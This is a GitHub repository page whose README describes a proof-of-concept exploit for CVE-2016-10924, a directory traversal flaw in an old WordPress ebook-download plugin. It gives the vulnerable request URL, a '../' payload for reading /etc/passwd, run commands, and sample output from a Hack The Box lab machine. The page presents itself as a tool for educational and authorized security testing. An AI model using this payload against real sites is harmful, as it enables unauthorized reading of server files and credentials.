Skip to content
/ cve-2016-10924-POC Public

Proof-of-Concept (PoC) exploit script for the Directory Traversal vulnerability (CVE-2016-10924) found in the WordPress plugin ebook-download (versions < 1.2). This vulnerability allows unauthorized file reads via a crafted GET request.

License

GPL-2.0 license
1 star 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

808ale/cve-2016-10924-POC

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
LICENSE
LICENSE
 
 
README.md
README.md
 
 
cve-2016-10924.py
cve-2016-10924.py
 
 

Repository files navigation

CVE-2016-10924-POC

This repository contains a Proof-of-Concept (PoC) exploit script for the Directory Traversal vulnerability (CVE-2016-10924) found in the WordPress plugin ebook-download (versions < 1.2).

This vulnerability allows unauthorized file reads via a crafted GET request. The exploit leverages a parameter called ebookdownloadurl to traverse directories on the target server.

Description

  • CVE-ID: CVE-2016-10924
  • Vulnerability Type: Directory Traversal
  • Affected Component: ebook-download plugin < 1.2 for WordPress
  • Impact: Remote attackers can read arbitrary files on the underlying operating system, such as /etc/passwd, by manipulating the file path in the ebookdownloadurl parameter.

Note: This PoC is for educational and authorized testing purposes only. Misuse of this information can lead to legal consequences.

Requirements

  • Python 3.
  • requests library (install via pip install requests)

Usage

  1. Clone the repository:

    git clone https://github.com/your-user/CVE-2016-10924-POC.git
cd CVE-2016-10924-POC

  2. Install Dependencies:

    pip install requests

  3. Run the Exploit:

    python3 cve-2016-10924.py "http://TARGET/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl="

  4. Specify the file path to read: After launching the script, you will be prompted for a file path. For example:

    ../../../../../../../../../etc/passwd

    You may need to adjust the number of ../ based on the webroot location in the target environment.

  5. Exit:

    • Type exit, quit, or press Enter on an empty prompt to exit.
    • Press Ctrl + C to stop the script immediately.

Example

I used this exploit on "Backdoor", a retired Hack The Box machine:

$ python3 cve-2016-10924.py "http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl="
[*] Enter file paths (e.g. ../../../../../etc/passwd). Type 'exit' to quit.

Enter File path: ../../../../../../../../../etc/passwd
[*] Target URL: http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../../../../../../../etc/passwd
[+] Status Code: 200
[+] File Content:
root:x:0:0:root:/root:/bin/bash
...

Disclaimer

This project is intended solely for educational and legitimate security testing purposes.
Do not use the information or scripts within this repository on any system you do not have explicit permission to test.
Author and contributors are not responsible for any misuse or damage caused by this tool.

License

This project is licensed under the GNU 2.0 License. Feel free to use and modify it, but please give credit.

References

About

Proof-of-Concept (PoC) exploit script for the Directory Traversal vulnerability (CVE-2016-10924) found in the WordPress plugin ebook-download (versions < 1.2). This vulnerability allows unauthorized file reads via a crafted GET request.

Resources

Readme

License

GPL-2.0 license
Activity

Stars

1 star

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages